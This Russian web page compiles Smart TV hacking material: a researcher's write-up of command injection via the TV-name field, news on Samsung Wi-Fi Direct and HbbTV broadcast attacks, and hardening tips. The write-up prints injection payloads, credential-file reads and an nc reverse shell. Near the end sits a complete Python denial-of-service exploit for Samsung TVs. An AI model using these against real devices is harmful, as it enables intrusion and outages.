Взлом Smart TV через внедрение команд
Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня.
Автор: Sven Morgenroth
Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня. Несмотря на то что чувствовалась усталость, я продолжал размышлять об уязвимости, найденной в роутере, который мне одолжил приятель. Нахождение брешей в подобного рода устройствах всегда является забавным мероприятиям, поскольку вскрываются детали, доступные лишь разработчикам и, возможно, службе технической поддержки.
Поскольку на тот момент я был очень уставшим, то намеревался лишь поставить таймер автоматического выключения и прилечь. Однако во время установки таймера меня заинтересовал вопрос, есть ли скрытые функции в меню настроек телевизора, доступные только разработчикам и службе поддержки. После непродолжительных поисков в Гугле в моем мобильном телефоне я обнаружил, что в этой марке телевизоров предусмотрен код, открывающий скрытое меню.
В тот момент мне захотелось получше узнать свой телевизор. Среди настроек была категория «info», открыв которую я увидел другие номера и версии. Затем мое внимание привлекла возможность, позволяющая назначить имя телевизору.
Уязвимость в Smart TV
При работе в сфере информационной безопасности постоянно приходится тестировать полезные нагрузки в различных полях ввода. К примеру, это может быть параметр GET-запроса, используемого веб-интерфейсом роутера, панели управления нового принтера или, как в моем случае, телевизора. Мне показалось, что будет забавно, если у телевизора будет имя «sleep 5».
Рисунок 1: Параметр для назначения имени телевизору
После ввода полезной нагрузки через пульт управления и сохранения результатов, меню с настройками замерло на некоторое время. Когда телевизор вернулся к жизни я изменил значение параметра, чтобы была возможность добраться до других пунктов меню. В тот момент я еще не догадывался, что нашел нечто похожее на уязвимость, связанную с внедрением команд. На самом деле замирание телевизора на несколько секунд после изменения настроек не являлось чем-то странным. Однако задержка на столь долгое время вызвала у меня любопытство.
Время замирания было намного больше чем 5 секунд. Возможно, все дело было в одиночных кавычках, и телевизор, не ожидая подобных входных данных, выдавал ошибку с целью предотвращения загрузки этих символов. Я попытался повторить эксперимент и ввел `sleep 0`. На этот раз все загрузилось моментально.
Происходило нечто не очень понятное, и я решил измерить время ответа в зависимости от значения параметра функции sleep. Выяснилось, что время замирания меню телевизора всегда в три раза дольше, чем значение этого параметра:
- sleep (2) — 6 секунд
- sleep (3) — 9 секунд
- sleep (5) — 15 секунд
Запуск команд в телевизоре
Я не мог поверить, что смог внедрить команду после первой же попытки. Замирание меню не было стопроцентным доказательством и в целом не столь полезно, если мы ведем речь об эксплуатации уязвимости. В моем распоряжении был 31 символ (минус две одинарные кавычки), полезная нагрузка должна быть не более 29 знаков.
Ниже показан список команд, которые я пытался запустить в моем телевизоре. Напротив каждой команды дается пояснение и результат запуска (успешно/неудачно).
Команда |
Описание |
Количество символов |
Успешный запуск |
`which nc && sleep 2` |
which – команда в Linux, возвращающая путь к приложению (если приложение существует) && sleep 2 – заморозка меню на 3*2 секунды, если после выполнение команды which найдена утилита nc (в телевизоре) |
19 |
Да |
`which ssh && sleep 2` |
Проверка, присутствует ли утилита ssh |
20 |
Нет |
`which wget && sleep 2` |
Оказалось, что присутствует утилита wget |
21 |
Да |
`cat /etc/passwd && sleep 2` |
Проверяем, доступен ли файл |
26 |
Да |
`cat /etc/shadow && sleep 2` |
Если у нас есть права суперпользователя, файл /etc/shadow доступен на чтение. Проверяем, есть ли у нас права суперпользователя. Однако файл оказался недоступным для чтения. |
26 |
Нет |
`ls /etc/shadow && sleep 2` |
Получаем объяснение, почему файл /etc/shadow не доступен на чтение. Этого файла не существует. |
25 |
Нет |
Далее нужно было подсоединить телевизор к ноутбуку через сетевой кабель, но уже сейчас я был доволен тем, что у меня получалось запускать команды в телевизоре лишь при помощи пульта управления.
Получение доступа к шеллу в телевизоре
Мой телевизор крепится к стене, и подключить сетевой кабель оказалось не так просто, как может показаться на первый взгляд. Преодолев некоторые сложности, мне все же удалось подключить кабель к телевизору с одной стороны и к ноутбуку с другой. Далее при помощи утилиты ipconfig я выяснил IP-адрес ноутбука.
Рисунок 2: Сетевые параметры ноутбука
После выяснения IP-адреса ноутбука мне лишь нужно было организовать обратный шелл. Таким образом, не нужно было знать IP-адрес телевизора. Кроме того, обратный шелл удобен тем, что позволяет обходить любые правила фаервола, которые блокируют входящие соединения. Однако перед тем как начать думать о том, как получить шелл, используя 29 символов, я решил по подробнее изучить систему.
Использование Netcat в телевизоре
После того как выяснилось, что в телевизоре есть утилита nc, я решил перенаправить результаты работы определенных команды через nc на мой ноутбук. Первой командой, естественно, стала id, при помощи которой нужно было выяснить, есть ли у нас права суперпользователя в системе телевизора.
Рисунок 3: Результат выполнения команды id
Как видно из рисунка выше, права суперпользователя у нас есть. Сей факт не столь примечателен, но тем не менее. Далее мне захотелось узнать содержимое корневой директории / при помощи команды `ls -la /|nc 169.254.56.216 5`.
Рисунок 4: Содержимое корневой директории
Отлично. Однако у меня до сих пор не было полноценного шелла для выполнения команд. Все возможные варианты не проходили проверку на длину и были не слишком полезными. Однако поскольку версия nc, установленная в телевизоре, поддерживала флаг –e, мне удалось организовать обратный шелл при помощи команды `nc 169.254.213.210 5 -e sh`.
Рисунок 5: Обратный шелл для выполнения команд в телевизоре
Теперь, когда у меня был полноценный шелл, я захотел увидеть результаты своей работы на экране телевизора. Здесь существует несколько возможностей. Например, смена логотипа при загрузке или изменение иконок приложений. Поскольку у меня был Smart TV, уже было установлено несколько программ, например, Youtube и Skype.

Рисунок 6: Приложение, предустановленные в телевизоре
Я заметил, что большая часть файловой системы была доступна только для чтения, и мне не удалось поменять логотип. Однако там были часто меняющиеся картинки, например, рамки превью, которые можно наблюдать при переключении каналов телевизора. Эти превью содержат снимки программ, идущих в тот момент, когда мы переходим в канал. Совершенно очевидно, что данные картинки сохраняются в месте, доступным для чтения и записи файлов.
Рисунок 7: Экран телевизора с обновленными картинками
Ваш телевизор не настолько умен, как вы думаете
Устройства, подключенные к интернету, могут иметь уязвимости в самых неожиданных местах. Там, где вы ожидаете меньше всего. Когда я тестировал команду sleep, то даже не мог и представить, что мой трюк сработает. Первоначально я решил провести свой эксперимент от скуки. Кроме того, я понятия не имел, что мой телевизор работает по управлением ОС Linux, и был еще больше удивлен, что найденные бреши пригодны к эксплуатации.
Данную уязвимость нельзя эксплуатировать удаленно, хотя что-то подсказывает мне, что я был прав, когда решил не подключать свой телевизор к интернету и не использовал продвинутые функции слишком часто. Я бы не ощущал себя комфортно с мыслью о том, что кто-то может управлять моим телевизором.
Предполагаю, что существует более интересные методы и бреши, пригодные для эксплуатации. Однако, думаю, не стоит добавлять седых волос в том момент, когда телевизор замирает, и ты думаешь, вышло ли устройство из строя или нет. В конце концов, телевизор предназначен для расслабления, а не для повышения кровяного давления, за исключением тех случаев, когда вы смотрите спортивные мероприятия. Например, футбол.
Смарт-телевизоры Samsung можно взломать через уязвимость в Wi-Fi Direct
Эксперты по вопросам безопасности из Neseso бьют тревогу относительно обнаруженной ими уязвимости в смарт-телевизоре Samsung, которую в самой компании отказались исправлять.
Уязвимость в системе безопасности связана с работой системы Wi-Fi Direct – стандарта Wi-Fi, который даёт возможность различным устройствам связываться между собой без необходимости использования точки беспроводного доступа.
Компания Smasung использует функцию Wi-Fi Direct для прямого подключения к смарт-телевизорам через мобильные телефоны, лэптопы, планшеты, минуя локальную точку доступа.
Смарт-телевизоры Samsung используют MAC-адреса для аутентификации
Эксперты из Neseso утверждают, что компании Samsung не удалось внедрить данный стандарт, поскольку телевизоры производства компании лишь используют MAC-адреса для аутентификации пользователей. Другие производители используют более надёжные системы аутентификации, основанные на нажатии кнопки (Push-Button) или введении PIN.
Тот факт, что каждый способен определять и подделывать MAC-адрес, говорит о том, что данная уязвимость открывает возможность взлома телевизора перед любым злоумышленником, находящимся в радиусе действия системы Wi-Fi Direct.
«После подключения к смарт-телевизору, злоумышленник получает доступ ко всем его функциям – таким, как служба удалённого управления и зеркальное отображение экрана DNLA», – пишут эксперты Neseso в своём отчёте.
Смарт-телевизоры можно будет использовать в качестве «точек входа» для других атак
Эксперты также утверждают, что злоумышленник может использовать доступ к телевизору в качестве точки входа в частную сеть пользователя или компании. Злоумышленник также может использовать учётную запись для сети Wi-Fi, к которой подключен телевизор, и атаковать другие устройства, находящиеся в ней.
Данная угроза вполне реальна для компаний, поскольку многие из них имеют смарт-телевизоры в своих офисах, комнатах для отдыха персонала и комнатах для заседаний.
Читайте также: Smart-шпионаж от Samsung
Самым ужасным в этой истории является тот факт, что в смарт-телевизорах производства компании Samsung функция Wi-Fi Direct активируется по умолчанию при каждом включении устройства. Пользователи видят на экранах уведомления о подключении к телевизору через службу Wi-Fi Direct устройств, внесённых в «белый список». Однако, данные уведомления могут быть неверно поняты владельцами телевизоров либо вообще остаться незамеченными в случае, если никто не смотрит телевизор в данный момент.
В Samsung не видят «угрозы для безопасности»
В середине марта эксперты из Neseso обратились в компанию Samsung с сообщением о выявленной уязвимости, однако в компании ответили, что не видят в данной уязвимости серьёзной угрозы для безопасности устройств, отказавшись выпускать обновление программного обеспечения.
В процессе изучения уязвимости эксперты из Neseso использовали версию 1480 прошивки UN32J5500 от Samsung, однако, по их мнению, другие версии прошивки также находятся в зоне риска. В настоящее время единственным способом защиты от таких атак является ручное принудительное отключение данной функции при каждом включении или перезагрузке устройства.
В апреле на Саммите экспертов безопасности 2017 эксперт Амихай Найдерман сообщил о наличии 40 нулевых уязвимостей в системе Tizen – операционной системе, которая обеспечивает работу смарт-телевизоров Samsung. На тот момент не было решений, направленных на ликвидацию данных уязвимостей.
Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.
Понравилось нас читать?
Подпишись тут
Хакеры научились взламывать Smart TV при просмотре телеэфира
До сих пор считалось, что для настройки удалённого доступа к чужому смарт-телевизору злоумышленнику требовалось получить к нему физический доступ для установки вредоносного приложения с USB-носителя. Или обманным путём заставить установить его самого владельца. Однако в швейцарской компании Oneconsult, специализирующейся на вопросах кибербезопасности, разработали новый метод — взлом устройства посредством вещания DVB-T, который применим к 90 % современных Smart TV.

Автором данного способа является исследователь Рафаэль Шиль (Rafael Scheel), по словам которого, в основе нового типа атаки лежит стандарт HbbTV. В мирных целях он служит для предоставления зрителю дополнительной информации из Интернета во время просмотра ТВ-передач. Если же речь идёт о преступных намерениях, то использование этой технологии, поддерживаемой всеми современными «умными» телевизорами, позволяет хакеру дать команду на загрузку определённого сайта с предварительно внедрённым в него вредоносным кодом. Что будет потом, догадаться несложно: атакующий может следить за пользователем, установить полный контроль над устройством и задействовать его для проведения DDoS-атак.

Что немаловажно, для проведения данной атаки не требуется дорогостоящее оборудование — достаточно будет приобрести комплект для трансляции DVB-T за $50–150. Чтобы ТВ-приёмник настроился именно на его сигнал, а не сигнал оператора, который априори мощнее, от злоумышленника требуется установить передатчик как можно ближе к «жертве», но не обязательно в том же помещении. Это может быть соседнее здание, или же оборудование может быть размещено на беспилотном летательном аппарате. Иными словами, физическое подключение к устройству и контакты с его владельцем не требуются. К тому же, отследить такие атаки крайне затруднительно ввиду того, что стандарт DVB-T подразумевает только одно направление потока данных — от передатчика к приёмнику.

Теоретически, аналогичные методы взлома могут быть применены и к другим технологиям цифрового телевещания — например, DVB-C или IPTV. Просто на сегодняшний день в Oneconsult опробованы только эксплойты для DVB-T. Их, кстати, создано два — один эксплуатирует уязвимость CVE-2015-3090 в Flash Player, другой ищет «дыру» в функции JavaScript Array.prototype.sort(). Разумеется, эти эксплойты разработаны исключительно в исследовательских целях. Более того, первый из них не представляет реальной угрозы, поскольку браузеры большинства современных Smart TV не поддерживают Flash; второй же задействует старую уязвимость. Впрочем, это не означает, что хакеры не найдут новые лазейки, да и обновления прошивок для смарт-ТВ выходят порой не так часто, как хотелось бы.
Если вы заметили ошибку — выделите ее мышью и нажмите CTRL+ENTER.
Как сделать новый Smart TV максимально безопасным
Продолжается пора предпраздничных скидок, и немало людей используют эту возможность, чтобы поменять старый телевизор на модель поновее. И почти наверняка она оснащена функцией Smart TV — которая не только даёт доступ к дополнительному контенту, но и ставит безопасность под угрозу. Конечно, взломанный телевизор звучит как история из криминальной драмы — но подобное действительно происходит с умной техникой.
В колонке Inc.com даже приводится предупреждение от ФБР: «Помимо того, что производитель телевизора и разработчики ПО могут прослушивать вас и получать видео с камеры, телевизор также может дать хакеру доступ к другой технике в доме.» В статье также приводятся советы, как обеспечить безопасность Smart TV — приводим самое важное.
Следите за безопасностью учётных записей

Самое ценное, что может получить злоумышленник, помимо доступа к другой технике в вашем доме — данные из приложений и сервисов. Вот что можно сделать для их защиты:
- Установите двухфакторную аутентификацию во всех приложениях и сервисах, которые это позволяют. Если такой возможности нет, убедитесь, что система будет запрашивать пароль для каждого входа в сеть и подтверждения всех покупок.
- По возможности не используйте на телевизоре приложения, у которых есть ваши персональные или платёжные данные. Потому что давайте будем честны: вам не так уж сильно нужно листать ленту Твиттера на 50-дюймовом экране.
- Если это возможно, сделайте для телевизора отдельные учётные записи.
- Не сохраняйте пароли на телевизоре. Да, вводить их каждый раз может быть нудно, но безопасность того стоит.
Всегда устанавливайте обновления для прошивки и приложений на телевизоре
Если вы не уверены, как это делать — проверьте инструкцию: на устройствах разных производителей процесс может отличаться. Если такая опция есть, лучше включить автоматическое обновление программ и системы — потому что даже 10 приложений регулярно обновлять вручную может быть крайне неудобно. Помните: каждый раз, когда вы откладываете обновление, вы можете оставить свою технику незащищённой от уязвимостей, которые закрыли в более новой версии.
Отключите или закройте камеру и микрофон
Получить доступ к камере или микрофону телевизора проще всего — при этом для злоумышленника эти данные могут представлять большую ценность. При этом большинство пользователей всё равно не пользуется возможностью звонить по Skype через телевизор. Если вы в их числе, отключите камеру и микрофон через настройки. Если по какой-то причине сделать это не удалось, ФБР рекомендует заклеить камеру.
Не используйте смартфон вместо пульта

Да, иногда это бывает очень удобно, но связь между смартфоном и Smart TV может скомпрометировать оба устройства: достаточно будет взломать одно из них, чтобы получить доступ к обоим. Лучше пользоваться старым добрым пультом.
Позаботьтесь о безопасности домашней сети
Надёжная защита домашней сети — лучшая забота о безопасности всех подключённых к ней устройств, и речь не только о телевизоре, но и о роутере, умной технике и других приборах. Подробнее о том, как защитить свою Wi-Fi-сеть и роутер, читайте в нашей статье.
Читайте также 🧐
Действительно ли возможен взлом телевизоров samsung smart tv
#!/usr/bin/python#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem — @MME_IT —
Скрыто от гостей
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
Скрыто от гостей
# P.O.C => #
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots…
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware
#
###
# —————————-
# import dependencies
# —————————-
import httplib
import time
import sys
import os
import time
# —————————-
# script colorize output
# —————————-
BLUE = ‘\033[94m’
RED = ‘\033[91m’
GREEN = ‘\033[32m’
WHITE = ‘\033[0m’
ORANGE = ‘\033[33m’
# —————————-
# exploit banner
# —————————-
print BLUE+»**************************************************************»
print WHITE+» Author: Malik Mesellem — @MME_IT —
Скрыто от гостей
«print WHITE+» Exploit: Denial of Service (DoS) attack»
print WHITE+» module by: pedr0 ubuntu aka r00t-3xp10it»
print «»
print WHITE+» Description:»
print WHITE+» The web server (DMCRUIS/0.1) on port TCP/5600″
print WHITE+» is crashing by sending a long HTTP GET request.»
print WHITE+» Tested successfully on my Samsung PS50C7700 plasma TV «
print BLUE+»**************************************************************»
# —————————-
# Sends the payload
# —————————-
print «»
print BLUE+»[*]»+GREEN+» press ctrl+z to stop»
print BLUE+»[*]»+WHITE+» Sending the malicious payload…»
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request(«GET», «A»*300)
conn.close()
# —————————-
# Checks the response
# —————————-
print BLUE+»[*]»+WHITE+» Checking the status…»
response = 0
while response == 0:
response = os.system(«ping -c 1 » + sys.argv[1] + «> /dev/null 2>&1»)
if response != 0:
print BLUE+»[*]»+GREEN+» (Success):»+RED+» the target seems to be down !!!»
print WHITE+»»
time.sleep(10)
Smart TV под угрозой: как взламывают современные телевизоры
Наверх- Рейтинги
- Обзоры
- Смартфоны и планшеты
- Компьютеры и ноутбуки
- Комплектующие
- Периферия
- Фото и видео
- Аксессуары
- ТВ и аудио
- Техника для дома
- Программы и приложения
- Новости
- Советы
- Покупка
- Эксплуатация
- Ремонт
- Подборки
- Смартфоны и планшеты
- Компьютеры
- Аксессуары
- ТВ и аудио
- Фото и видео
- Программы и приложения
- Техника для дома
- Гейминг
- Игры
- Железо
- Еще
- Важное
- Технологии
- Тест скорости